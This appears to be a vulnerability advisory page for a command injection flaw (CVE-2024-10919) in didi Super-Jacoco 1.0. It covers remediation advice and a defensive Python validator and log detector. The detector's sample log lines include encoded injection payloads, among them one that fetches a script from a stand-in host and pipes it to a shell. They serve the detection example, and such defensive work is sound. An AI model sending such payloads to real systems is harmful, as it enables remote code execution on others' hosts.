CVE-2024-10919: A remote OS command injection vulnerability exists in didi Super-Jacoco 1.0 via the /cov/triggerUnitCover endpoint. By manipulating the uuid parameter, an attacker can potentially execute arbitrary commands on the host. The advisory rates the vulnerability as critical; the 1.0 release is affected.

Description Preview

The vulnerability (CVE-2024-10919) affects didi Super-Jacoco 1.0 and stems from unsafe handling of the uuid argument in the /cov/triggerUnitCover endpoint. It can be exploited remotely, allowing an attacker to inject and execute OS commands on the vulnerable host. The issue is classified as CWE-78 (OS Command Injection) and CWE-74 (Injection). The advisory describes the vulnerability as critical, although the listed CVSS base scores fall in the medium range (CVSS v3.1: 6.3, CVSS v3.0: 6.3, CVSS v4.0: 5.3, CVSS v2.0: 6.5); the two ratings differ because they weigh different things (exploitability and disclosure status versus the scored impact vector), so treat the public exploit, not the score alone, as the driver for prioritisation. A public exploit has been disclosed, so the risk is practical rather than theoretical. Version 1.0 is the identified affected release.

Overview

This CVE describes a command injection vulnerability in didi Super-Jacoco 1.0 arising from unsafe handling of the uuid parameter in the /cov/triggerUnitCover endpoint. The flaw permits remote exploitation, enabling an attacker to run arbitrary commands on the host; the impact depends on the privileges of the process running Super-Jacoco, and a coverage service that checks out and builds source code typically holds repository credentials and build tooling worth protecting. The vulnerability is associated with OS command injection (CWE-78) and general injection (CWE-74), and the public exploit disclosure indicates real-world risk.

Remediation

  • Upgrade to a fixed version or apply a vendor-provided patch for didi Super-Jacoco if one is released for the 1.0 line. If no patch is available, implement the compensating controls below and monitor for exploitation.
  • Validate and sanitize all user-controlled inputs, especially the uuid parameter, on the server side. Do not build a shell command string from input; invoke the process with a discrete argument list so the value is never parsed by a shell, and make sure any script that receives the value quotes it rather than expanding it unquoted.
  • Implement strict allow-listing for the expected uuid format (the canonical 8-4-4-4-12 hexadecimal form); reject anything else before it reaches any command execution layer. Allow-listing is preferable to deny-listing shell metacharacters, which is easy to bypass with encoding or characters the list omits.
  • Restrict access to the vulnerable endpoint (/cov/triggerUnitCover) with authentication, authorization checks, and network access controls (e.g., IP allowlists, firewall rules). A coverage service rarely needs to be reachable from outside the CI network.
  • Run the application under a least-privilege service account, separate from accounts that hold sensitive system or repository credentials, so a successful injection does not yield those credentials directly.
  • Deploy Web Application Firewall (WAF) rules or IDS signatures to detect and block command-injection payloads targeting this endpoint. Treat these as a detective layer, not a fix: URL encoding and alternative metacharacters can evade signature matching, and the rule should flag any uuid value that does not match the allow-list rather than only known payloads.
  • Test in a controlled environment to verify that input validation and command execution paths are properly hardened before deploying to production.
  • Monitor logs and alert on requests to the endpoint whose uuid parameter is malformed, and on anomalous child processes spawned by the service. If exploitation is detected, rotate the credentials the service could reach, investigate, and contain affected hosts.
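The validation, shell-free invocation and detection steps in the bullets above, as an added example that is not Super-Jacoco's own code (the project is written in Java; the Python below illustrates the same pattern so it can be run against sample input). It shows a strict allow-list for uuid, the unsafe shell-string construction beside the hardened argv form with a tokeniser that makes the injected command visible, and a detector that flags requests to /cov/triggerUnitCover whose uuid query parameter fails the allow-list. The script name unit_cover.sh, the argv layout, the access-log format, the IP addresses and the log lines are assumptions constructed for the illustration.

```python
"""Allow-list validation of the uuid parameter, shell-free command construction,
and a log detector for injection attempts against /cov/triggerUnitCover.

Added example, not Super-Jacoco's own code. The script name unit_cover.sh, the
argv layout, the access-log format and the sample lines are constructed for
illustration.
"""
import re
import shlex
from urllib.parse import parse_qs, urlsplit

# Allow-list: only the canonical RFC 4122 textual form (8-4-4-4-12 hex) passes.
# Shell metacharacters, whitespace or extra segments fail the match outright.
UUID_RE = re.compile(
    r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.IGNORECASE
)


def is_valid_uuid(value: str) -> bool:
    """True only if the whole value is a UUID in canonical form."""
    return UUID_RE.fullmatch(value) is not None


def unsafe_shell_line(uuid: str) -> str:
    """The anti-pattern: user input interpolated into a string handed to a
    shell. Returned, not executed, so its tokenisation can be inspected."""
    return f"sh unit_cover.sh {uuid}"  # hypothetical coverage script


def shell_tokens(line: str) -> list[str]:
    """Tokenise a command line the way a POSIX shell would, keeping operators
    such as ';' and '|' as separate tokens so injected commands become visible."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    return list(lexer)


def safe_argv(uuid: str) -> list[str]:
    """Hardened form: reject anything outside the allow-list, then pass the
    value as one argv element. Execute with subprocess.run(argv) (shell=False,
    the default) so no shell ever parses the value; the script must still
    quote "$1" on its side."""
    if not is_valid_uuid(uuid):
        raise ValueError(f"uuid rejected by allow-list: {uuid!r}")
    return ["sh", "unit_cover.sh", uuid]  # hypothetical coverage script


# Common Log Format with request line; assumed layout, not a real capture.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TARGET_PATH = "/cov/triggerUnitCover"


def suspicious_requests(log_lines):
    """Return (client_ip, decoded_uuid) for every request to the endpoint whose
    uuid query parameter fails the allow-list. Only query-string parameters are
    visible in an access log; a uuid sent in a POST body must be inspected at
    the application or WAF layer instead."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != TARGET_PATH:
            continue
        # parse_qs percent-decodes, so %3B is checked as ';' and %24 as '$'.
        for uuid in parse_qs(url.query, keep_blank_values=True).get("uuid", []):
            if not is_valid_uuid(uuid):
                hits.append((m.group("ip"), uuid))
    return hits


# Constructed sample lines: one benign request, two injection attempts against
# the endpoint, and one malformed value against a different path (ignored).
SAMPLE_LOG = [
    '203.0.113.10 - - [11/Nov/2024:08:01:22 +0000] "GET /cov/triggerUnitCover'
    '?uuid=3f2a1b4c-9d8e-4f6a-b1c2-0a9b8c7d6e5f HTTP/1.1" 200 512',
    '203.0.113.10 - - [11/Nov/2024:08:01:30 +0000] "GET /cov/triggerUnitCover'
    '?uuid=3f2a1b4c-9d8e-4f6a-b1c2-0a9b8c7d6e5f%3Bcurl%20198.51.100.7%2Fx%7Csh'
    ' HTTP/1.1" 200 512',
    '198.51.100.22 - - [11/Nov/2024:08:02:01 +0000] "POST /cov/triggerUnitCover'
    '?uuid=%24%28id%29 HTTP/1.1" 500 88',
    '198.51.100.22 - - [11/Nov/2024:08:02:05 +0000] "GET /cov/status?uuid=x%3Bid'
    ' HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, payload in suspicious_requests(SAMPLE_LOG):
        print(f"ALERT {ip} uuid={payload!r}")
```

Running the module prints two alerts, one per injection attempt; the benign request and the malformed value sent to /cov/status are not reported. The detector deliberately keys on "does not match the allow-list" rather than on a list of known payloads, so encoded or unusual metacharacters are caught the same way as a plain semicolon.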

References

  • VDB-283315 | didi Super-Jacoco triggerUnitCover os command injection — https://vuldb.com/?id.283315
  • VDB-283315 | CTI Indicators (IOB, IOC, TTP, IOA) — https://vuldb.com/?ctiid.283315
  • Submit #432689 | didi super-jacoco 1.0 Command Injection — https://vuldb.com/?submit.432689
  • GitHub issue: didi/super-jacoco/issues/49 — https://github.com/didi/super-jacoco/issues/49

Industry Exposure (most to least)

This section illustrates the prevalence of a specific Common Vulnerabilities and Exposures (CVE) across various industries based on customer reports. The ranking displays industries from the most to least affected by this particular vulnerability, offering insight into where this CVE has been most frequently observed. This information can help organizations within these sectors prioritize their security efforts, understand their relative risk exposure compared to their peers, and focus remediation strategies where they are most needed. By understanding the industry-specific impact, organizations can make more informed decisions regarding patching, resource allocation, and overall risk management related to this CVE.

  1. Accommodation & Food Services: Low
  2. Administrative, Support, Waste Management & Remediation Services: Low
  3. Agriculture, Forestry, Fishing & Hunting: Low
  4. Arts, Entertainment & Recreation: Low
  5. Construction: Low
  6. Educational Services: Low
  7. Finance and Insurance: Low
  8. Health Care & Social Assistance: Low
  9. Information: Low
  10. Management of Companies & Enterprises: Low
  11. Manufacturing: Low
  12. Mining: Low
  13. Other Services (except Public Administration): Low
  14. Professional, Scientific, & Technical Services: Low
  15. Public Administration: Low
  16. Real Estate Rental & Leasing: Low
  17. Retail Trade: Low
  18. Transportation & Warehousing: Low
  19. Utilities: Low
  20. Wholesale Trade: Low
